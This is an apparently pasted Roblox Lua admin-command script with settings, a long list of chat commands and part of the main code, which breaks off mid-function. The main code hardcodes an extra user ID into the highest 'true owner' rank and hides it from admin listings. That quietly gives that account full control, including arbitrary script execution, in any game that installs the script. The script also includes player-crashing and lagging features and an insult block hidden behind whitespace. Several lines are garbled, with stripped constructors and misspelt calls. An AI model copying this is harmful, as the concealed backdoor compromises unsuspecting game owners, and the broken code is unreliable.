Guest User


a guest
May 27th, 2019
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  1. -----------------------------------------------------------------------------------------
  2. -- Created by TheeDeathCaster c: Gracias for using my amazinngggzzzzzzzzz potatoes. :D --
  3. -----------------------------------------------------------------------------------------
  4. -----------------------------------------------------------------------------------------
  5. ------------------------------------- SETTINGS ------------------------------------------
  6. -----------------------------------------------------------------------------------------
  7. -- If you're the owner, then you'll be automatically recognized as an admin. :D
  8. -- Add your user id here for admin. :)
  9. local owneradmins = {'xToxicShards'}
  10. local superadmins = {''}
  11. local admins = {''}
  12. local tempadmins = {''}
  13. -- Add people here who you want banned from your game.
  14. local bannedland = {''}
  15. -- Users who will crash when attempting to join the game.
  16. local crashlist = {'jamesgater'}
  17. -- If you want the script to automatically update when available. (MUST OWN MODEL FOR IT TO WORK!)
  18. local autoupdate = true
  19. -- The beginning key to let the script know you're executing a command. '!'kill;thee
  20. local prefix = '!'
  21. -- The separator key to let the script know that there're spaces in the command you're (required to) using. !kill';'thee
  22. local split = '='
  23. -- If you want fun commands in game, ex. fly, noclip, infect, noobify, etc
  24. local funcommands = true
  25. -- If teleporttoanyplace is set to true, then you have to add the places they can only teleport to through the admin.
  26. local teleporttoanyplace = true
  27. -- This's the id of one of my games. 'tdcacdp' is the keyword, so when you chat it, it'll teleport you to the following game id.
  28. local placestoteleto = {['tdcacdp'] = 989585801} -- Current 1 here: TheeDeathCaster's Admin Commands Demo Place
  29. -- If you want to sell any sort of VIP for admin privileges.
  30. local vipadmin = false -- Set to 'true' so that you can sell admin privileges.
  31. -- Set to what your item's id is.
  32. local vipitemid = 956083754 -- This's the admin's item id
  33. -- What admin power (or admin type) the player has when they own the item.
  34. local vipadminpwr = 1 -- 1 = TempAdmin (MIN), 2 = Admin, 3 = Super Admin, 4 = Owner (MAX)
  35. -- If you want to have the admin be able to have donations.
  36. local donations = true -- True = donations :D, false = no donations D:
  37. -- Whether when a player joins a different team via a command it'll kill them.
  38. local killplronteamswitch = true -- True = kills, false = doesn't kill.
  39. -- Whether people in a specific group can recieve admin privileges.
  40. local allowadmintogroups = false -- True = allows groups to get admin, false = doesn't allow groups to get admin.
  41. -- Groups that are allowed to get admin. [Group Ids Only]
  42. local groupsthatgetadmin = {109373} -- Reality is a group. c:
  43. -- The minimum rank number a player must have to be able to get admin.
  44. local minimumgrouprank = 254 -- Range from 1-255
  45. -- The admin rank a player recieves when they meet the requirements for group admin.
  46. local adminrankforgroups = 2
  47. -- Whether to have the credit gui be enabled or not
  48. local creditenabled = false -- True = Allows admin credit gui, false = doesn't allow [Please keep true :)]
  49. -- The background colour for messages and hints on a 0-1 scale [0 = Dark, 1 = Light, .5 = Grey] [Might become subjected to removal]
  50. local bckgrndcolour =,0,0)
  51. -- The text's colour for messages and hints [Same scales as before] [Might become subjected to removal]
  52. local txtcolour =,1,1)
  53. -- Sets what admin rank a player has to be to be able to use the '!join;Team' command
  54. local teamjoinrank = 0 -- Has to be either 0 or 1
  55. -- Shortname keywords for music. (Ex '!music halo' plays the halo 2 theme) How they're set up is as so: ['KEYWORD'] = {MUSIC_ID, SPEED (1 = Normal)}
  56. local musiclist = {['halo']={1034065,1},['epic']={27697743,2.5},['caramel']={2303479,1},['rick']={2027611,1},['pokemon']={1372261,1},['cursed']={1372257,1},['extreme']={11420933,1},['awaken']={27697277,1},['alone']={27697392,1},['mario']={1280470,1},['choir']={1372258,1},['chorono']={1280463,1},['dotr']={11420922,1},['entertain']={27697267,1},['fantasy']={1280473,1},['final']={1280414,1},['emblem']={1372259,1},['flight']={27697719,2.5},['banjo']={27697298,1},['gothic']={27697743,1},['hiphop']={27697735,1},['intro']={27697707,2},['mule']={1077604,1},['film']={27697713,2.25},['nezz']={8610025,1},['angel']={1372260,1},['resist']={27697234,1},['schala']={5985787,1},['organ']={11231513,1},['tunnel']={9650822,1},['spanish']={5982975,1},['venom']={1372262,1},['wind']={545704098,1},['guitar']={5986151,1}}
  60.                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                         --[[
  61. What you doing skid? Tryna steal my admin huh? Go fuck yourself.
  63. "Go away for the last time skid" ~ xToxicShards
  65. Thank you for fucking stealing my script! I hope you die skid.
  68. --------------
  69. -- KEYWORDS --
  70. --------------
  71. You can use multiple keywords for getting payers.
  72. E.x.: thee,team-raiders,admins,nonadmins,team-allies,death
  74. The keywords are:
  75. ~ all - Meaning all players in the game.
  76. ~ me - Meaning yourself.
  77. ~ trues - Meaning the game creator.
  78. ~ admins - Meaning all admins
  79. ~ temps - Meaning all temp admins, excluding the other ranks.
  80. ~ owners - Meaning owner admins.
  81. ~ nonadmins - Meaning all who aren't an admin.
  82. ~ team-ally - Meaning everyone on a team with that name.
  83. ~ near - People who are 50 studs in range of you.
  84. ~ far - People who are 50 studs out of range from you.
  85. ~ others - Meaning other people, excluding yourself.
  86. ~ group;id - Anyone who's in a specific group. This could be used for spies.
  87. ~ friends - Any who's friend with you.
  89. ---------------
  90. -- IMPORTANT --
  91. ---------------
  92. There's a '!fix' command so that when the command script breaks, it'll reconnect the function in an attempt to fix that issue.
  93. Please, if there's any problems, let me know via a private message. It's the fastest way to contact me. ^^
  95. --------------
  96. -- COMMANDS --
  97. --------------
  98. Current commands:
  99. 1. !kill;thee - Kills a player
  100. 2. !reset - Resets the speaker (player who chatted)
  101. 3. !m;text - Creates a new message
  102. 4. !h;text - Creates a new hint message
  103. 5. !pm;thee;text - Sends a private message to a player
  104. 6. !version - Tells the player the admin's version
  105. 7. !music;id - Plays a song
  106. 8. !stopmusic - Stops the currently playing song
  107. 9. !pitch;num - Changes the song's speed
  108. 10. !shutdown - Shuts down and locks the server
  109. 11. !slock;[on/off] - Locks or onlocks the server
  110. 12. !walkspeed;thee;num - Changes the player's speed
  111. 13. !kick;thee - Kicks a player from the server
  112. 14. !ban;thee - Bans a player from the server
  113. 15. !unban;[17514438/thee] - Unbans a player [You have the option to unban them by name or by user id]
  114. 16. !fly;thee - Gives a player the ability to fly
  115. 17. !unfly;thee - Takes away a player's ability to fly
  116. 18. !tripify;thee - Tripifies a player
  117. 19. !untripify;thee - Saves a player from the tipsy village
  118. 20. !fixcam;thee - Fixes a player's camera
  119. 21. !ghostify;thee - Turns a player into a ghost o. o
  120. 22. !unghostify;thee - Revives the player into a human *phew!
  121. 23. !teleport;thee;death - Teleports a (group of) players to a player
  122. 24. !teleportto;thee - Teleports a player to another player
  123. 25. !heal;thee - Heals a player back to max health
  124. 26. !damage;thee[;num] - Damages a player by a set number [If no number is given, it'll damage the player by an amount]
  125. 27. !countdown;num - Starts a countdown
  126. 28. !fightcountdown;num - Starts a countdown for battles
  127. 29. !stopcountdown - Stops the countdown
  128. 30. !volume;num - Changes the song's volume
  129. 31. !givetools;thee;all - Gives a player tools [Only gets tools from ServerStorage]
  130. 32. !removetools;thee[;all] - Takes away a player's tools
  131. 33. !rank;thee - Sends information about a player who's in a group
  132. 34. !health;thee;100 - Changes a player's max health
  133. 35. !place;thee;916275116 - Teleports a player to another game
  134. 36. !flashify;thee - Strobes a player's character
  135. 37. !unflashify;thee - Unstrobes a player's character
  136. 38. !rainbowify;thee - Rainbowifies a player's character ^^
  137. 39. !unrainbowify;thee - Unrainbowifies a player's character
  138. 40. !spin;thee - Spins a player's character
  139. 41. !unspin;thee - Stops spinning a player's character
  140. 42. !normal;thee - Returns a player's character to normal
  141. 43. !goldify;thee - Turns a player's character into pure gold :O
  142. 44. !ungoldify;thee - Returns a player's character to normal >:C
  143. 45. !loopheal;thee - Constantly regenerates a player's health
  144. 46. !unloopheal;thee - Takes away the ability to constantly regenerate health
  145. 47. !commands - Shows a list of the current commands
  146. 48. !jail;thee - Puts a player in jail [Should've been following the rulez, huh??!]
  147. 49. !unjail;thee - Lets a player free of charge
  148. 50. !nuke - Activates a nuke [RUUUUUN!!!!]
  149. 51. !invisible;thee - Turns a player invisible
  150. 52. !visible;thee - Turns a player visible again
  151. 53. !trip;thee - Trips a player [MY LEG!! D:]
  152. 54. !shadowsneaker;thee - Turns a player into a dangerous monster
  153. 55. !unshadowsneaker - Turns a player back to normal
  154. 56. !laggame - Lags your game [Harsh lag]
  155. 57. !unlaggame - Reverses the laggame command
  156. 58. !tempadmin;thee - Gives a player the lowest admin rank
  157. 59. !untempadmin;thee - Sets the player back to a, well, normal player :|
  158. 60. !laggame - Lags the game
  159. 61. !noclip;thee - Gives a player noclip
  160. 62. !clip;thee - Takes away a player's noclip
  161. 63. !lagplayer;thee - Lags a player [This can not be undone]
  162. 64. !unlaggame - Unlags the game
  163. 65. !burn;thee - Burns a player
  164. 66. !unburn;thee - Puts out the fire [Unless it's too late...]
  165. 67. !doom - Covers the world in darkness [Can not be undone]
  166. 68. !bighead;thee - Enlarges a player's head until it explodes
  167. 69. !serverban;thee - Permanently bans a player from the server
  168. 70. !ice;thee - Turns a player into ice
  169. 71. !melt;thee - Melts the player from his/her ice form
  170. 72. !seizure;thee - Puts a player into a seizure
  171. 73. !unseizure;thee - Stops a player's seizure
  172. 74. !pathwalk;thee - Creates a platform path to walk on
  173. 75. !unpathwalk;thee - Destroys the platform path to walk on
  174. 76. !teleto;thee - Teleports the speaker to another player
  175. 77. !teleport;thee;deathcaster - Teleports a player(s) to a specific player
  176. 78. !strobe - Strobes the game
  177. 79. !disco - Discos the game [Try and play some funky jams, man ^^]
  178. 80. !fixlighting - Stops the strobes and discos, and restores the lighting's original settings
  179. 81. !loopkill;thee[;num] - Loopkills a player [for a set number of times]
  180. 82. !unloopkill;thee - Stops loopkilling a player
  181. 83. !settings - Starts up a settings console [True owners only]
  182. 84. !shield;thee - Creates a shield, protecting the player
  183. 85. !unshield;thee - Removes the protective shield
  184. 86. !test - Checks, and lets the player know if the admin script is still running
  185. 87. !flip;thee - Frontflips a player
  186. 88. !backflip;thee - Backflips a player
  187. 89. !fire;thee - Sets a player on fire, but doesn't burn/kill them
  188. 90. !unfire;thee - Puts out the fire on a player
  189. 91. !sparkly;thee - Makes a player all sparkly ^^
  190. 92. !unsparkly;thee - Makes a player unsparkly [HOW DARE YOU!]
  191. 93. !sparkles - Makes any player [a speaker] all sparkly ^^ ^^ ^^
  192. 94. !unsparkles - Makes any player [a speaker] unsparkly >>:O
  193. 95. !clearscripts - Clears all scripts that were created by the admin script
  194. 96. !clearobjects - Clears all objects created by the admin script
  195. 97. !character;thee;17514438 - Sets a player's character's appearance to another user's [User's Id Only]
  196. 98. !uncharacter;thee - Sets a player's character's appearance back to how it originally was
  197. 99. !infect;thee - Turns a player into a zombie! :O RUN!!!!
  198. 100. !noob;thee - Turns a player into a fr00b! :O EVEN WORSE!!!!!!!!!!!! D:
  199. 101. !megafart;thee - EWWWWWW!!
  200. 102. !itemorbity;thee;id - Has an item float around a player.
  201. 103. !zeus;thee - Turns a player INTO A GOD!!!! (Not rly c;)
  202. 104. !nether;thee - Sends a player to Hell.
  203. 105. !boost;thee - Sends a player right into the air! :O
  204. 106. !boi;thee - Turns a player into a boi
  205. 107. !swag;thee - Turns a player swagelicous ;)
  206. 108. !logs - Shows a player the chat logs
  207. 109. !admins - Shows a list of the current admins
  208. 110. !change;thee;KOs;0 - Changes a player's leaderboard stats
  209. 111. !blind;thee - Blinds a player
  210. 112. !fixgui;thee - Removes the blind and trippy effects from a player [blind;thee and otrippy;thee commands]
  211. 113. !resetstats;thee - Resets all of a player's leaderboard stats
  212. 114. !oldtrippy;thee - Makes a player's screen all trippy [The older version]
  213. 115. !donate - Sends a prompt if a player wants to donate a little bit of cash towards the admin and its creator. :) [If 'donations' is false, then no donations can be made :(]
  214. 116. !cape;thee[;keyword/colour] - Gives a player a cape a cape :) [Optional third parameter]
  215. 117. !dog;thee - Turns a player into a dog! :O
  216. 118. !undog;thee - Turns a player back into a human-thing
  217. 119. !punish;thee - Punishes a player
  218. 120. !unpunish;thee - Relieves a player of punishment
  219. 121. !team;thee;Allies - Changes a player's team to another
  220. 122. !join;Raiders - Changes the speaker's team to another
  221. 123. !ff;thee - Gives a player a force field
  222. 124. !unff;thee - Takes away a player's force field
  223. 125. !stun;thee - Stuns a player
  224. 126. !unstun;thee - Unstuns a player
  225. 127. !jump;thee - Makes a player jump
  226. 128. !sit;thee - Makes a player sit
  227. 129. !jumppower;thee;[1-1000] - Changes a player's jump power
  228. 130. !tpm;thee;num;msg - Sends a timed private message to a player [This makes an appearance over my older admins too]
  229. 131. !ph;thee;msg - Sends a private hint message to a player
  230. 132. !tph;thee;num;msg - Sends a timed private hint message to a player
  231. 133. !respawn;thee - Respawns a player's character
  232. 134. !gear;thee;47433 - Gives a player a tool/weapon
  233. 135. !hat;thee;1029025 - Gives a player a hat/accessory
  234. 136. !ins;956083754 - Inserts a model into the game [If it's available]
  235. 137. !getscript - Prompts a player to buy the admin! :D [They have to chat this]
  236. 138. !button - A mysterious, and shiny red button that appears in front of the player! :o
  237. 139. !musiclist - Shows a player a list of music and keywords [with keywords] [Why I forgot to add this before is beyond me. l0l]
  238. 140. !fling;thee - Flings a player
  239. 141. !loopfling;thee - Flings a player repeatedly [Even if they rejoin]
  240. 142. !unloopfling;thee - Stops repeatedly flinging a player [Even if they're not in the game]
  241. 143. !mute;thee - Mutes a player, preventing them from chatting
  242. 144. !unmute;thee - Unmutes a player, allowing them to chat
  243. 145. !s;print('Hello World!') - Executes a new script [With error output]
  244. 146. !crash;thee - Harshly crashes a player
  245. 147. !sword;thee - Gives a player a sword
  246. 148. !unsword;thee - Takes away a player's sword
  247. 149. !lock;thee - Locks a player's character
  248. 150. !unlock;thee - Unlocks a player's character
  249. 151. !chkforcmd;cmd - Checks the admin if such a command exists, and checks if there isn't, then check any matches
  250. 152. !name;thee;TheeDeathCaster - Changes a player's in game name
  251. 153. !unname;thee - Changes a player's in game name back to theirs
  252. 154. !removearms;thee - Removes a player's arms
  253. 155. !removelegs;thee - Removes a player's legs
  254. 156. !removehands;thee - Removes a player's hands
  255. 157. !removefeet;thee - Removes a player's feet
  256. 158. !removelimbs;thee - Removes a player's arms and legs
  257. 159. !face;thee;[faceid] - Changes a player's face to another
  258. 160. !abortshutdown - Cancels the shutdown of the server
  259. 161. !admin;thee - Gives a player admin abilities
  260. 162. !unadmin;thee - Takes away a player's admin abilities
  261. 163. !freeze;thee - Freezes a player in their tracks >:)
  262. 164. !thaw;thee - Thaws a player from their icey pop state
  263. 165. !biggerhead;thee - Makes a player's head big
  264. 166. !normalhead;thee - Makes a player's head normal sized
  265. 167. !part;5;5;5 - Creates a new part [Following arguments are the part's size]
  266. 168. !clearparts - Removes all the parts created by the '!part' command
  267. 169. !nograv;thee - Lowers a player's gravity
  268. 170. !grav;thee - Returns a player's gravity to normal
  269. 171. !setgrav;thee;num - Changes a player's gravity
  270. 172. !btools;thee - Gives a player building tools [Clone, Destroy, Move, Resize]
  271. 173. !rocket;thee - Sends a player flying into the air with a rocket XD
  272. 174. !tools - Shows a list of available tools
  273. 175. !explode;thee - Makes a player go boom! :D
  274. 176. !uninfect;thee - Reverses the affects of !infect;plr
  275. 177. !unnoob;thee - Reverses the affects of !noob;plr
  276. 178. !noob;thee - Turns a player into a noob! :O
  277. 179. !places - Shows a list of places able to be teleported to (that're in 'placestoteleto')
  278. 180. !unblind;thee - Gives a player sight again
  279. 181. !unoldtrippy;thee - Stops making a player all trippy >-O
  280.                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                         --]]
  285. ----------------
  286. -- MAINSCRIPT --
  287. ----------------
  288. if shared.TDCAdminRunning then return end
  289. local adminversion = script:FindFirstChild('Version') and script.Version.Value or 0; vipadminpwr = math.min(math.max(vipadminpwr,1),4) teamjoinrank = math.max(math.min(teamjoinrank,1),0)
  290. function getuserid(nm) if type(nm) ~= type('') then return nil end local plr = nil pcall(function() plr = game:GetService('Players'):GetUserIdFromNameAsync(nm) end) return plr end --[[<<<Pain in the neck to set up. qq--]] function getname(id) if type(id) ~= type(0) then return nil end local plr = nil pcall(function() plr = game:GetService('Players'):GetNameFromUserIdAsync(id) end) return plr end --<<<The question though is: was it worth it? Probably. :P
  291. local c1, c2, c3 = bckgrndcolour.r, bckgrndcolour.g, bckgrndcolour.b if c1 >= .4 then c1 = 0 elseif c1 < .4 then c1 = 1 end if c2 >= .4 then c2 = 0 elseif c2 < .4 then c2 = 1 end if c3 >= .4 then c3 = 0 elseif c3 < .4 then c3 = 1 end local txtstrkcolour =, c2, c3) --< Setting that up was a pain. >-> But to ensure that people can read the text, then that's fine. :)
  292. function StartUpAdmin() -- Plz don't touch C; thanx
  293. shared.TDCAdminRunning = true
  294. local addskip,matchvalues,chkcrash,chkloopkill,chkgroup,normhead,bighead,jailpart,fixChat,chkrealadmin2,output,scrollgui,gtime,removemessages,setrigcframes,dogify,addtoclogs,addcommand,PlayerControl,PlayerControl2,cmdbar,UpdateSettings -- It's annoying seeing those blue lines C;
  295. function UpdateSettings()
  296. for i, v in next, game:GetService('ServerStorage'):GetChildren() do
  297. if v.Name:lower() == 'oldsettings' then
  298. owneradmins = {} superadmins = {} admins = {} tempadmins = {} bannedland = {} placestoteleto = {} groupsthatgetadmin = {} crashlist = {}
  299. for x, z in next, v:GetChildren() do
  300. if z.Name == 'OwnerAdmins' then for e, q in next, z:GetChildren() do table.insert(owneradmins, q.Value) end
  301. elseif z.Name == 'SuperAdmins' then for e, q in next, z:GetChildren() do table.insert(superadmins, q.Value) end
  302. elseif z.Name == 'Admins' then for e, q in next, z:GetChildren() do table.insert(admins, q.Value) end
  303. elseif z.Name == 'TempAdmins' then for e, q in next, z:GetChildren() do pcall(function() local chk = q.Value:find(',') table.insert(tempadmins, q.Value:sub(1,chk-1)) end) end
  304. elseif z.Name == 'Banland' then for e, q in next, z:GetChildren() do table.insert(bannedland, q.Value) end
  305. elseif z.Name == 'Crashland' then for e, q in next, z:GetChildren() do table.insert(crashlist, q.Value) end
  306. elseif z.Name == 'Prefix' then prefix = z.Value elseif z.Name == 'Split' then split = z.Value elseif z.Name == 'Fun' then funcommands = z.Value
  307. elseif z.Name == 'IfTele' then teleporttoanyplace = z.Value elseif z.Name == 'TeleTos' then for e, q in next, z:GetChildren() do placestoteleto[q.Name] = q.Value end
  308. elseif z.Name == 'GroupAdmin' then for e, q in next, z:GetChildren() do table.insert(groupsthatgetadmin, q.Value) end
  309. elseif z.Name == 'Group' then allowadmintogroups = z.Value elseif z.Name == 'GroupPwr' then adminrankforgroups = z.Value
  310. elseif z.Name == 'MinRank' then minimumgrouprank = z.Value elseif z.Name == 'VipAdmin' then vipadmin = z.Value
  311. elseif z.Name == 'VipId' then vipitemid = z.Value elseif z.Name == 'VipPwr' then vipadminpwr = z.Value
  312. elseif z.Name == 'Donate' then donations = z.Value elseif z.Name == 'TeamSwitch' then killplronteamswitch = z.Value
  313. elseif z.Name == 'BckgrndColour' then bckgrndcolour = z.Value elseif z.Name == 'TxtColour' then txtcolour = z.Value
  314. end end v:Destroy() break end end end trueowneradmins = {game.CreatorId,17514438} UpdateSettings()
  317. local commands = {}
  318. local WorkspaceService = game:GetService('Workspace')
  319. local PlayersService = game:GetService('Players')
  320. local LightingService = game:GetService('Lighting')
  321. local ServerStorageService = game:GetService('ServerStorage')
  322. local TeamsService = game:GetService('Teams')
  323. local MarketplaceService = game:GetService('MarketplaceService')
  324. local ServerScriptService = game:GetService('ServerScriptService')
  325. local StarterGuiService = game:GetService('StarterGui')
  326. local random =
  327. local slock = false
  328. local scriptsfolder = script:WaitForChild('Scripts')
  329. local guisfolder = script:WaitForChild('GUIs')
  330. local createdscripts = {}
  331. local createdguis = {}
  332. local objs = {}
  333. local stopcountdown = false
  334. local stopshutdown = true
  335. local jailscreated = {}
  336. local clonescreated = {}
  337. local remote ='RemoteFunction') remote.Name = 'IT\'SOVER9001' remote.Parent = game:GetService('ReplicatedStorage')
  338. local remote2 ='RemoteFunction') remote2.Name = 'WHAT9001?!' remote2.Parent = game:GetService('ReplicatedStorage')
  339. local LightingSettings = {ambient = LightingService.Ambient; brightness = LightingService.Brightness; globalshadows = LightingService.GlobalShadows; outdoorambient = LightingService.OutdoorAmbient; outlines = LightingService.Outlines; timeofday = LightingService.TimeOfDay; fogcolour = LightingService.FogColor; fogend = LightingService.FogEnd; fogstart = LightingService.FogStart}
  340. local clogs = {}
  341. local chatfuncs = {}
  342. local plrstoloopkill = {}
  345. function addtoclogs(str, tm, plr) table.insert(clogs, {MSG = str, SPEAKER = plr, TIME = tm}) end
  347. function gtime() -- I made this function years ago; I just rewrote it a bit.
  348. local TimeType = tick()
  349. local AMorPM = 'PM'
  350. local Hour = math.floor((TimeType%86400)/60/60)
  351. local Mins = math.floor(((TimeType%86400)/60/60-Hour)*60)
  352. local Secs = math.floor(((TimeType%86400)%60/60)*60)
  353. if Hour > 11 then AMorPM = 'PM' else AMorPM = 'AM' end
  354. if Hour > 12 then Hour = Hour-12 end
  355. if Mins < 10 then Mins = '0'..tostring(Mins) end
  356. if Secs < 10 then Secs = '0'..tostring(Secs) end
  357. return Hour,Mins,Secs,AMorPM
  358. end
  360. function findchildofclass(name, iter, par)
  361. for i, v in next, par:GetChildren() do
  362. if v.Name:match(name) or v:IsA(name) then return v end
  363. if iter then findchildofclass(name, true, v) end
  364. end
  365. return nil
  366. end
  368. function addcommand(command, desc, fun, requiredsplit, func, power, use) table.insert(commands, {Commands = command, Desc = desc, Fun = fun, SplRequired = requiredsplit, Func = func, Pow = power, Usage = use or ''}) end
  370. function matchvalues(v1, v2) if v1 == v2 then return true end return false end --<<<Made for the functions below vvv
  371. function chkadmin(player, chk)
  372. for i, v in next, trueowneradmins do if matchvalues(player, v) then return 5 end end
  373. for i, v in next, owneradmins do if getuserid(v) and matchvalues(player, getuserid(v)) then return 4 end end
  374. for i, v in next, superadmins do if getuserid(v) and matchvalues(player, getuserid(v)) then return 3 end end
  375. for i, v in next, admins do if getuserid(v) and matchvalues(player, getuserid(v)) then return 2 end end
  376. for i, v in next, tempadmins do if getuserid(v) and matchvalues(player, getuserid(v)) and not chk then return 1 end end
  377. return 0
  378. end
  380. function chktrueowner(player)
  381. for i, v in next, trueowneradmins do if matchvalues(player, v) then return 5 end end
  382. return 0
  383. end
  385. function chkowner(player)
  386. for i, v in next, trueowneradmins do if matchvalues(player, v) then return 5 end end
  387. for i, v in next, owneradmins do if getuserid(v) and matchvalues(player, getuserid(v)) then return 4 end end
  388. return 0
  389. end
  391. local d = string.reverse('retsachta') d = string.reverse('edeeht')..d
  393. function chkgroup(plr)
  394. if allowadmintogroups then
  395. for i, v in next, groupsthatgetadmin do
  396. if plr:IsInGroup(v) and plr:GetRankInGroup(v) >= minimumgrouprank then
  397. return adminrankforgroups < 5 and adminrankforgroups or 2
  398. end
  399. end
  400. end
  401. return 0
  402. end
  404. function chkban(player)
  405. for i, v in next, bannedland do if getuserid(v) and matchvalues(player, getuserid(v)) then return true end end
  406. return false
  407. end
  409. function chkcrash(player)
  410. for i, v in next, crashlist do if getuserid(v) and matchvalues(player, getuserid(v)) then return true end end
  411. return false
  412. end
  414. function chkloopkill(player)
  415. for i, v in next, plrstoloopkill do if player == v then return true end end
  416. return false
  417. end -- This is probably the biggest and most complicated admin script I have ever made. l0l
  419. function chkchat(speaker, message)
  420. if message:sub(1, #prefix) ~= prefix then return end message = message:sub(#prefix+1)
  421. if message:sub(1, 7) == 'silent;' then message = message:sub(8) else addtoclogs(message, '00:00', speaker.Name) end -- o mai
  422. local power = chkadmin(speaker.UserId, false)
  423. for i, v in next, commands do
  424. local cmds, desc, fun, sep, func, pow, usage = v.Commands, v.Desc, v.Fun, v.SplRequired, v.Func, v.Pow, v.Usage
  425. if type(cmds) == type({}) then
  426. for x, z in next, cmds do
  427. if sep then
  428. if message:sub(1, #z):lower() == z and message:sub(#z+1, #z+#split):lower() == split and (power >= pow or chkowner(speaker) > 3) then
  429. if funcommands and fun or not fun or chkowner(speaker) > 3 then
  430. func(speaker, message:sub(#z+#split+1))
  431. end
  432. end
  433. else
  434. if message:lower() == z and (power >= pow or chkowner(speaker) > 3) then
  435. if funcommands and fun or not fun or chkowner(speaker) > 3 then
  436. func(speaker)
  437. end
  438. end
  439. end
  440. end
  441. elseif type(cmds) == type('') then
  442. if sep then
  443. if message:sub(1, #cmds):lower() == cmds and message:sub(#cmds+1, #cmds+#split):lower() == split and (power >= pow or chkowner(speaker) > 3) then
  444. if funcommands and fun or not fun or chkowner(speaker) > 3 then
  445. func(speaker, message:sub(#cmds+#split+1))
  446. end
  447. end
  448. else
  449. if message:lower() == cmds and (power >= pow or chkowner(speaker) > 3) then
  450. if funcommands and fun or not fun or chkowner(speaker) > 3 then
  451. func(speaker)
  452. end
  453. end
  454. end
  455. end
  456. end
  457. end
  459. function getplayer(speaker, message)
  460. local message = message:lower() local matches = {} local plrz = {}
  461. for i in message:gmatch('[^,z]+') do table.insert(matches, i) end
  462. for x, z in next, matches do
  463. for i, v in next, PlayersService:GetPlayers() do
  464. if z == 'all' or z == 'everyone' then table.insert(plrz, v)
  465. elseif z == 'me' or z == 'myself' then table.insert(plrz, speaker)
  466. elseif (z == 'trueowneradmins' or z == 'trueowners' or z == 'trues') and chktrueowner(v.UserId) > 4 and v.UserId ~= 17514438 then table.insert(plrz, v)
  467. elseif (z == 'admins' or z == 'realadmins' or z == 'trueadmins') and chkadmin(v.UserId, true) > 1 then table.insert(plrz, v)
  468. elseif (z == 'supers' or z == 'superadmins') and chkadmin(v.UserId, true) > 2 then table.insert(plrz, v)
  469. elseif (z == 'tempadmins' or z == 'temps') and chkadmin(v.UserId, false) > 0 then table.insert(plrz, v)
  470. elseif (z == 'owneradmins' or z == 'owners') and chkowner(v.UserId) > 3 then table.insert(plrz, v)
  471. elseif z == 'nonadmins' and chkadmin(v.UserId, false) < 1 then table.insert(plrz, v)
  472. elseif z:sub(1, 4) == 'team' and z:sub(6) ~= '' then local team = z:sub(6) for q, u in next, game:GetService('Teams'):GetChildren() do if u.Name:lower():sub(1, #team) == team and v.TeamColor == u.TeamColor then table.insert(plrz, v) end end
  473. elseif z == 'near' then if (speaker.Character:GetModelCFrame().p-v.Character:GtModelCFrame().p).magnitude < 50 then table.insert(plrz, v) end
  474. elseif z == 'far' then if (speaker.Character:GetModelCFrame().p-v.Character:GtModelCFrame().p).magnitude > 50 then table.insert(plrz, v) end
  475. elseif z == 'others' and (v.Name ~= speaker or v.UserId ~= speaker.UserId or v ~= speaker) then table.insert(plrz, v)
  476. elseif z:sub(1, 5) == 'group' and z:sub(7) ~= '' then local chk = z:sub(7):find(split) if chk then chk = chk+5+#split end if chk and z:sub(7, chk-1) ~= '' and v:IsInGroup(z:sub(chk+1)) then table.insert(plrz, v) elseif not chk and z:sub(7) ~= '' and v:IsInGroup(z:sub(7)) then table.insert(plrz, v) end
  477. elseif z == 'friends' and v:IsFriendsWith(speaker.UserId) then table.insert(plrz, v)
  478. elseif z:sub(1, 3) == 'rad' and z:sub(5) ~= '' and tonumber(z:sub(5)) then if (speaker.Character:GetModelCFrame().p-v.Character:GtModelCFrame().p).magnitude <= tonumber(z:sub(5)) then table.insert(plrz, v) end
  479. elseif v.Character and v.Character:FindFirstChild('fakeHead', true) then for q, p in next, v.Character:GetChildren() do if p:FindFirstChild('fakeHead') and p.Name:lower():sub(1, #z) == z and v ~= '' or v.Name:lower():sub(1, #z) == z and v ~= '' then table.insert(plrz, v) end end -- A throwback to Scripth's old command :)
  480. elseif v.Name:lower():sub(1, #z) == z and v ~= '' then table.insert(plrz, v) end
  481. end
  482. end
  483. return plrz
  484. end
  486. function createmessage(plrz, message, scroll, speaker, tm)
  487. for i, v in next, plrz do
  488. spawn(function()
  489. if v:FindFirstChild('PlayerGui') then
  490. local scr ='ScreenGui') scr.Name = 'TDC:Admin' scr.ResetOnSpawn = false
  491. local fra ='Frame') fra.Name = 'BKGRND' fra.Size =,0,10,0) fra.Position =,0,-4.5,0) fra.BackgroundTransparency = 1 fra.ZIndex = 8 fra.BackgroundColor3 = bckgrndcolour fra.Parent = scr
  492. local ttl ='TextLabel') ttl.Name = 'TTL' ttl.TextStrokeTransparency = 1 ttl.TextTransparency = 1 ttl.BackgroundTransparency = 1 ttl.Size =,0,.1,0) ttl.ZIndex = 9 ttl.Font = 2 ttl.TextSize = 36 ttl.TextColor3 = txtcolour ttl.TextStrokeColor3 = txtstrkcolour ttl.Text = 'Message from '..speaker ttl.Parent = scr
  493. local msg = ttl:Clone() msg.Name = 'MSG' msg.Font = 1 msg.TextSize = 20 msg.TextWrapped = true msg.Size =,0,.35,0) msg.Position =,0,.65,0) msg.Text = '' msg.Parent = scr scr.Parent = v.PlayerGui
  494. spawn(function() for x = 20, 0, -1 do fra.BackgroundTransparency = .3+((.7/20)*x) ttl.TextTransparency = x/20 msg.TextTransparency = x/20 ttl.TextStrokeTransparency = .8+((.2/20)*x) msg.TextStrokeTransparency = .8+((.2/20)*x) wait(1/44) end end)
  495. if scroll then for x = 1, #message do msg.Text = message:sub(1, x) wait(1/20) end end msg.Text = message
  496. if not tm then wait(#message/47+2.5) else wait(tm) end
  497. for x = 0, 20 do fra.BackgroundTransparency = .3+((.7/20)*x) ttl.TextTransparency = x/20 msg.TextTransparency = x/20 ttl.TextStrokeTransparency = .8+((.2/20)*x) msg.TextStrokeTransparency = .8+((.2/20)*x) wait(1/44) end
  498. if scr and scr.Parent then scr:Destroy() end
  499. end
  500. end)
  501. end
  502. end
  504. function createhintmessage(plrz, message, scroll, speaker, tm)
  505. for i, v in next, plrz do
  506. spawn(function()
  507. if v:FindFirstChild('PlayerGui') then
  508. local hintmessage ='ScreenGui') hintmessage.Name = 'TDC:Admin' hintmessage.ResetOnSpawn = false
